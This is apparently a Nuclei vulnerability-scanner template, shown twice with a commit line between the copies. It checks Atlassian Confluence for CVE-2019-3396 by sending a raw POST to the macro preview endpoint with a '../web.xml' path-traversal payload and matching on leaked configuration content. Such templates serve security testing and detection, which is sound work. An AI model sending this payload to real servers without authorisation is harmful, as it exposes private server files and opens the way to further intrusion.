nuclei-templates/cves/CVE-2019-3396.yaml

id: CVE-2019-3396
info: 
  author: "Harsh Bothra"
  name: "Atlassian Confluence Path Traversal"
  severity: High

# https://github.com/x-f1v3/CVE-2019-3396

requests: 
  - raw: 
      - |
           POST /rest/tinymce/1/macro/preview HTTP/1.1
           Host: {{Hostname}}
           Accept: */*
           Accept-Language: en-US,en;q=0.5
           User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
           Referer: {{Hostname}}
           Content-Length: 168
           Accept-Encoding: gzip, deflate
           Connection: close
   
           {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}

    matchers-condition: and  
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<param-name>contextConfigLocation</param-name>"
Create CVE-2019-3396.yaml Atlassian Confluence Path Traversal/RCE 2020-07-07 07:24:27 +00:00			`id: CVE-2019-3396`
			`info:`
			`author: "Harsh Bothra"`
			`name: "Atlassian Confluence Path Traversal"`
			`severity: High`

			`# https://github.com/x-f1v3/CVE-2019-3396`

			`requests:`
			`- raw:`
			`- \|`
			`POST /rest/tinymce/1/macro/preview HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Accept-Language: en-US,en;q=0.5`
			`User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0`
			`Referer: {{Hostname}}`
			`Content-Length: 168`
			`Accept-Encoding: gzip, deflate`
			`Connection: close`

			`{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- "<param-name>contextConfigLocation</param-name>"`